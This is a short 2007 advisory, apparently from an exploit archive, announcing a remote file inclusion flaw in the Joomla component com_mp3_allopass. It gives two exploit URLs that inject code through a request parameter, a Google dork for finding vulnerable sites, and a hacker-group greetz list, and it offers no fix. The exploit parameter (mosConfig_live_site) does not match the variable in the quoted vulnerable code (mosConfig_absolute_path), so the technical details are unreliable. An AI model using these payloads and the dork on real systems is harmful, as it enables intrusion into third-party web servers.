Joomla Component MP3 Allopass 1.0 Remote File Inclusion Vulnerability

2007-10-10 00:00:00

# com_mp3_allopass joomla component Remote File Include Vulnerability

Component : com_mp3_allopass
Download file : http://www.joomlaratings.com
Dicovered by : NoGe
Contact : [email protected]

==================================================================================================================================

# Vulnerable file

/components/com_mp3_allopass/allopass.php

line 3 require_once("{$mosConfig_absolute_path}/components/com_mp3_allopass/allopass-conf.php");

/components/com_mp3_allopass/allopass-error.php

line 2 require_once("{$mosConfig_absolute_path}/components/com_mp3_allopass/allopass-conf.php");

# Exploit

http://localhost/path/components/com_mp3_allopass/allopass.php?mosConfig_live_site=[evilcode]
http://localhost/path/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=[evilcode]

# google dork

inurl:com_mp3_allopass

==================================================================================================================================

# Greetz

all member #papuahacker #nyubicrew #baliemhackerlink
skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie str0ke
yooogy H312Y Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq
http://kapukvalley.net member

==================================================================================================================================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.